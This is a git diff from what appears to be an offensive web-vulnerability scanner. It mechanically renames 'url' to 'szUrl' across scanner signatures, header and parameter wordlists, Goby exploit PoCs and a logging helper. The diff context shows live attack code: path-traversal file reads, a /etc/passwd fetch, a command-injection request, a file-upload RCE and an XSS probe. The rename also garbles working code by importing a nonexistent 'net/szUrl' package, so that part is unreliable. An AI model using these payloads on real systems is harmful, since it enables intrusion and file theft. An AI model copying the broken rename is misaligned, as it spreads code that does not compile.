 "006778","0","2be","/sitecore/debug/Profile.xslt","GET","Data\sCache","cachemiss","","","","Sitecore CMS admin/restricted pages available","",""
 "006779","0","2be","/sitecore/login/default.aspx","GET","LoginPanelOuter","","","","","Sitecore CMS admin login","",""
 "006780","0","2be","/sitecore/shell/WebService/Service.asmx","GET","operations\sare\ssupported","","","","","Sitecore CMS webservice found","",""
-"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This url redirects to the login page.","",""
+"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This szUrl redirects to the login page.","",""
 "006782","0","2be","/sitecore/admin/stats.aspx","GET","Renderings","","","","","Sitecore CMS admin/restricted pages available","",""
 "006783","0","2be","/wcadmin/login.aspx","GET","QS\/1","","","","","QS/1 Webconnect administration panel","",""
-"006784","74115","4","/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
+"006784","74115","4","/sitecore/login?xmlcontrol=Application&szUrl=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
 "006785","102660","4","/?xmlcontrol=body%20onload=alert(123)","GET","<body\sONLOAD=ALERT\s123","","","","","Sitecore CMS vulnerable to Cross-Site Scripting","",""
 "006786","0","be","/crystal/enterprise10/admin/en/admin.cwr","GET","Crystal\sManagement\sConsole","","","","","Crystal Enterprise Management Console found","",""
 "006787","0","1","/encrypt.aspx","GET","200","","","","","This might be interesting.","",""
diff --git a/config/wordlists/headers b/config/wordlists/headers
index 930946b28..100ff5c60 100644
--- a/config/wordlists/headers
+++ b/config/wordlists/headers
@@ -62,7 +62,7 @@ bae-env-sk
 bae-logid
 bar
 base
-base-url
+base-szUrl
 basic
 bearer-indication
 body-maxlength
@@ -198,7 +198,7 @@ disable-gzip
 dkim-signature
 dnt
 download-attachment
-download-bad-url
+download-bad-szUrl
 download-bz2
 download-cut-short
 download-e-headers-sent
@@ -220,7 +220,7 @@ download-status-unauthorized
 download-status-unknown
 download-tar
 download-tgz
-download-url
+download-szUrl
 download-zip
 e-encoding
 e-header
@@ -234,7 +234,7 @@ e-request-pool
 e-response
 e-runtime
 e-socket
-e-url
+e-szUrl
 enable-gzip
 enable-no-cache-headers
 encoding-stream-flush-full
@@ -321,7 +321,7 @@ http-cookie
 http-host
 http-phone-number
 http-referer
-http-url
+http-szUrl
 http-user-agent
 http_sm_authdirname
 http_sm_authdirnamespace
@@ -535,7 +535,7 @@ proxy-socks4
 proxy-socks4a
 proxy-socks5
 proxy-socks5-hostname
-proxy-url
+proxy-szUrl
 proxy-user
 public-key-pins
 public-key-pins-report-only
@@ -601,7 +601,7 @@ request-error-gzip-read
 request-error-proxy
 request-error-redirects
 request-error-response
-request-error-url
+request-error-szUrl
 request-http-ver-1-0
 request-http-ver-1-1
 request-mbstring
@@ -619,7 +619,7 @@ request-timeout
 request-uri
 request-uri-too-large
 request-vars
-request2-tests-base-url
+request2-tests-base-szUrl
 request2-tests-proxy-host
 requesttoken
 reset-content
@@ -741,7 +741,7 @@ ua-pixels
 ua-resolution
 ua-voice
 unauthorized
-unencoded-url
+unencoded-szUrl
 unit-test-mode
 unless-modified-since
 unprocessable-entity
@@ -751,21 +751,21 @@ upgrade-insecure-requests
 upgrade-required
 upload-default-chmod
 uri
-url
-url-from-env
-url-join-path
-url-join-query
-url-replace
-url-sanitize-path
-url-strip-
-url-strip-all
-url-strip-auth
-url-strip-fragment
-url-strip-pass
-url-strip-path
-url-strip-port
-url-strip-query
-url-strip-user
+szUrl
+szUrl-from-env
+szUrl-join-path
+szUrl-join-query
+szUrl-replace
+szUrl-sanitize-path
+szUrl-strip-
+szUrl-strip-all
+szUrl-strip-auth
+szUrl-strip-fragment
+szUrl-strip-pass
+szUrl-strip-path
+szUrl-strip-port
+szUrl-strip-query
+szUrl-strip-user
 use-gzip
 use-proxy
 user
@@ -844,7 +844,7 @@ x-browser-height
 x-browser-width
 x-cascade
 x-cept-encoding
-x-cf-url
+x-cf-szUrl
 x-chrome-extension
 x-cisco-bbsm-clientip
 x-client-host
@@ -906,7 +906,7 @@ x-firephp-version
 x-flash-version
 x-flx-consumer-key
 x-flx-consumer-secret
-x-flx-redirect-url
+x-flx-redirect-szUrl
 x-foo
 x-foo-bar
 x-forward-for
@@ -999,7 +999,7 @@ x-orig-client
 x-original-host
 x-original-http-command
 x-original-remote-addr
-x-original-url
+x-original-szUrl
 x-original-user-agent
 x-originally-forwarded-for
 x-originally-forwarded-proto
@@ -1013,7 +1013,7 @@ x-phpbb-using-plupload
 x-pjax
 x-pjax-container
 x-prototype-version
-x-proxy-url
+x-proxy-szUrl
 x-pswd
 x-purpose
 x-qafoo-profiler
@@ -1031,7 +1031,7 @@ x-response-format
 x-rest-cors
 x-rest-password
 x-rest-username
-x-rewrite-url
+x-rewrite-szUrl
 x-sakura-forwarded-for
 x-scalr-auth-key
 x-scalr-auth-token
@@ -1076,7 +1076,7 @@ x-upload-maxresolution
 x-upload-name
 x-upload-size
 x-upload-type
-x-url-scheme
+x-szUrl-scheme
 x-user
 x-user-agent
 x-username
diff --git a/config/wordlists/parameters b/config/wordlists/parameters
index 08e7852f2..210f6ebcc 100644
--- a/config/wordlists/parameters
+++ b/config/wordlists/parameters
@@ -58,7 +58,7 @@ dest
 redirect
 uri
 continue
-url
+szUrl
 window
 next
 data
diff --git a/lib/goby/goby_pocs/Jellyfin_Audio_File_read_CVE_2021_21402.txt b/lib/goby/goby_pocs/Jellyfin_Audio_File_read_CVE_2021_21402.txt
index 556925480..f6a8f04a3 100755
--- a/lib/goby/goby_pocs/Jellyfin_Audio_File_read_CVE_2021_21402.txt
+++ b/lib/goby/goby_pocs/Jellyfin_Audio_File_read_CVE_2021_21402.txt
@@ -6,7 +6,7 @@ import (
 	"git.gobies.org/goby/goscanner/jsonvul"
 	"git.gobies.org/goby/goscanner/scanconfig"
 	"git.gobies.org/goby/httpclient"
-	"net/url"
+	"net/szUrl"
 	"strings"
 )
 
@@ -100,7 +100,7 @@ func init() {
 		func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
 			file := ss.Params["File"].(string)
 			file = strings.Replace(file, "/", "\\", -1)
-			file = url.QueryEscape(file)
+			file = szUrl.QueryEscape(file)
 			uri := "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5C" + file + "/stream.mp3/"
 			cfg := httpclient.NewGetRequestConfig(uri)
 			cfg.VerifyTls = false
diff --git a/lib/goby/goby_pocs/JingHe_OA_download.asp_File_read.txt b/lib/goby/goby_pocs/JingHe_OA_download.asp_File_read.txt
index a725c2e99..8a8e0f4b6 100755
--- a/lib/goby/goby_pocs/JingHe_OA_download.asp_File_read.txt
+++ b/lib/goby/goby_pocs/JingHe_OA_download.asp_File_read.txt
@@ -8,7 +8,7 @@ import (
 	"git.gobies.org/goby/httpclient"
 	"strings"
 	"regexp"
-	"net/url"
+	"net/szUrl"
 )
 
 func init() {
diff --git a/lib/goby/goby_pocs/ShopXO_download_File_read_CNVD_2021_15822.txt b/lib/goby/goby_pocs/ShopXO_download_File_read_CNVD_2021_15822.txt
index 25646a5ca..8fb9cab5b 100755
--- a/lib/goby/goby_pocs/ShopXO_download_File_read_CNVD_2021_15822.txt
+++ b/lib/goby/goby_pocs/ShopXO_download_File_read_CNVD_2021_15822.txt
@@ -75,7 +75,7 @@ func init() {
 		goutils.GetFileName(),
 		expJson,
 		func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
-		    uri := "/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q="
+		    uri := "/public/index.php?s=/index/qrcode/download/szUrl/L2V0Yy9wYXNzd2Q="
 			cfg := httpclient.NewGetRequestConfig(uri)
 			cfg.VerifyTls = false
 			cfg.FollowRedirect = false
@@ -89,7 +89,7 @@ func init() {
 		    file := ss.Params["File"].(string)
 		    strbytes := []byte(file)
             encoded := base64.StdEncoding.EncodeToString(strbytes)
-		    uri := "/public/index.php?s=/index/qrcode/download/url/" + encoded
+		    uri := "/public/index.php?s=/index/qrcode/download/szUrl/" + encoded
 			cfg := httpclient.NewGetRequestConfig(uri)
 			cfg.VerifyTls = false
 			cfg.FollowRedirect = false
diff --git a/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt
index 50348eb27..192f62294 100644
--- a/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt	
+++ b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt	
@@ -171,7 +171,7 @@ func init() {
 		requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}"
 
 		if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
-			if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
+			if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"szUrl\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
 				return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1]
 			}
 		}
diff --git a/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt
index ab95cac74..996d40bcb 100644
--- a/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt
+++ b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt
@@ -5,7 +5,7 @@ import (
 	"git.gobies.org/goby/goscanner/jsonvul"
 	"git.gobies.org/goby/goscanner/scanconfig"
 	"git.gobies.org/goby/httpclient"
-	"net/url"
+	"net/szUrl"
 	"strings"
 )
 
@@ -14,7 +14,7 @@ func init() {
 
 	exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
 		// 攻击 URL
-		requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd))
+		requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + szUrl.QueryEscape(cmd))
 		requestConfig.VerifyTls = false
 		requestConfig.FollowRedirect = false
 		requestConfig.Timeout = 15
diff --git a/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt
index 727a29303..91b479ad1 100644
--- a/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt
+++ b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt
@@ -6,7 +6,7 @@ import (
 	"git.gobies.org/goby/goscanner/jsonvul"
 	"git.gobies.org/goby/goscanner/scanconfig"
 	"git.gobies.org/goby/httpclient"
-	"net/url"
+	"net/szUrl"
 	"strings"
 	"time"
 )
@@ -226,7 +226,7 @@ func init() {
 					cfg3.FollowRedirect = false
 					cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
 					cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
-					cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
+					cfg3.Data = fmt.Sprintf("1=%s", szUrl.QueryEscape(cmd))
 					if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
 						expResult.Output = resp3.RawBody
 						expResult.Success = true
diff --git a/lib/goby/goby_pocs/showDocGo.txt b/lib/goby/goby_pocs/showDocGo.txt
index 59c67b98c..873f89d9e 100755
--- a/lib/goby/goby_pocs/showDocGo.txt
+++ b/lib/goby/goby_pocs/showDocGo.txt
@@ -4,7 +4,7 @@ import (
 	"encoding/base64"
 	"fmt"
 	"log"
-	"net/url"
+	"net/szUrl"
 	"regexp"
 	"strings"
 	"time"
@@ -137,7 +137,7 @@ func init() {
 							select {
 							case webConsleID := <-waitSessionCh:
 								log.Println("[DEBUG] session created at:", webConsleID)
-								if u, err := url.Parse(strings.TrimSpace(webConsleID)); err == nil {
+								if u, err := szUrl.Parse(strings.TrimSpace(webConsleID)); err == nil {
 									expResult.Success = true
 									expResult.OutputType = "html"
 									sid := strings.Join(u.Query()["id"], "")
diff --git a/lib/util/sv2es.go b/lib/util/sv2es.go
index b02df66f8..310a7e31a 100644
--- a/lib/util/sv2es.go
+++ b/lib/util/sv2es.go
@@ -6,6 +6,7 @@ import (
 	"encoding/hex"
 	"encoding/json"
 	"fmt"
+	"github.com/hktalent/PipelineHttp"
 	"io/ioutil"
 	"log"
 	"net/http"
@@ -76,6 +77,8 @@ func SendAData[T any](k string, data []T, szType ESaveType) {
 	}
 }
 
+var pphLog = PipelineHttp.NewPipelineHttp()
+
 // 发送数据到ES
 func SendReq(data1 interface{}, id string, szType ESaveType) {
 	DoSyncFunc(func() {
@@ -88,47 +91,25 @@ func SendReq(data1 interface{}, id string, szType ESaveType) {
 		defer func() {
 			<-nThreads
 		}()
-		//log.Println("EsUrl = ", EsUrl)
-		url := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id))
-		//log.Println("url = ", url)
-		req, err := http.NewRequest("POST", url, bytes.NewReader(data))
-		if err != nil {
-			Log(fmt.Sprintf("%s error %v", id, err))
-			return
-		}
-		// 取消全局复用连接
-		// tr := http.Transport{DisableKeepAlives: true}
-		// client := http.Client{Transport: &tr}
-		req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15")
-		req.Header.Add("Content-Type", "application/json;charset=UTF-8")
-		// keep-alive
-		req.Header.Add("Connection", "close")
-		req.Close = true
-
-		resp, err := http.DefaultClient.Do(req)
-		//log.Println("url = ", url)
-		if resp != nil {
-			defer func() {
-				err := resp.Body.Close() // resp 可能为 nil，不能读取 Body
-				if nil != err {
-					Log(fmt.Sprintf("%s error %v", id, err))
+		szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id))
+		log.Println("logs EsUrl = ", EsUrl)
+		pphLog.DoGetWithClient4SetHd(nil, szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) {
+			if nil != err {
+				log.Println("pphLog.DoGetWithClient4SetHd ", err)
+			} else {
+				body, err := ioutil.ReadAll(resp.Body)
+				if nil == err && 0 < len(body) {
+					Log("Es save result ", string(body))
+				} else {
+					Log(err)
 				}
-			}()
-		}
-		if err != nil {
-			Log(fmt.Sprintf("%s error %v", id, err))
-			return
-		}
-
-		body, err := ioutil.ReadAll(resp.Body)
-		if nil == err && 0 < len(body) {
-			//Log("Es save result ", string(body))
-		} else {
-			Log(err)
-		}
-		//_, err = io.Copy(ioutil.Discard, resp.Body) // 手动丢弃读取完毕的数据
-		// json.NewDecoder(resp.Body).Decode(&data)
-		// req.Body.Close()
-		// go http.Post(resUrl, "application/json",, post_body)
+			}
+		}, func() map[string]string {
+			m1 := map[string]string{
+				"User-Agent":   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+				"Content-Type": "application/json;charset=UTF-8",
+			}
+			return m1
+		}, true)
 	})
 }
diff --git a/static/NicePwn.md b/static/NicePwn.md
index ceacfb605..679477576 100644
--- a/static/NicePwn.md
+++ b/static/NicePwn.md
@@ -97,7 +97,7 @@ config/nuclei_esConfig.yaml
   "httpx": {}   // httpx 配置,
   "enableEsSv": true,        // 开启结果send 到es
   "esthread": 8 // 结果写入Elasticsearch的线程数,
-  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s" // Elasticsearch url
+  "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s" // Elasticsearch szUrl
 }
 ```
 
@@ -118,6 +118,6 @@ http://127.0.0.1:9200/naabu_index/_doc/_search
 http://127.0.0.1:9200/vscan_index/_doc/_search
 http://127.0.0.1:9200/hydra_index/_doc/_search
 http://127.0.0.1:9200/httpx_index/_doc/_search
-http://127.0.0.1:9200/httpx_index/_doc/_search?q=url:in%20%221.28.15.18%22
+http://127.0.0.1:9200/httpx_index/_doc/_search?q=szUrl:in%20%221.28.15.18%22
 
 ```
\ No newline at end of file
diff --git a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
index 2cf4a1b4c..7a11a3519 100644
--- a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
+++ b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
@@ -345,7 +345,7 @@ func (request *Request) ExecuteWithResults(reqURL string, dynamicValues, previou
 const drainReqSize = int64(8 * 1024)
 
 var errStopExecution = errors.New("stop execution due to unresolved variables")
-
+var someMapMutex = sync.RWMutex{}
 // executeRequest executes the actual generated request and returns error if occurred
 func (request *Request) executeRequest(reqURL string, generatedRequest *generatedRequest, previousEvent output.InternalEvent, hasInteractMatchers bool, callback protocols.OutputEventCallback, requestCount int) error {
 	request.setCustomHeaders(generatedRequest)
@@ -583,6 +583,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate
 		if request.options.Interactsh != nil {
 			request.options.Interactsh.MakePlaceholders(generatedRequest.interactshURLs, outputEvent)
 		}
+		someMapMutex.Lock()
 		for k, v := range previousEvent {
 			finalEvent[k] = v
 		}
@@ -598,6 +599,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate
 				finalEvent[key] = v
 			}
 		}
+		someMapMutex.Unlock()
 		// prune signature internal values if any
 		request.pruneSignatureInternalValues(generatedRequest.meta)
 
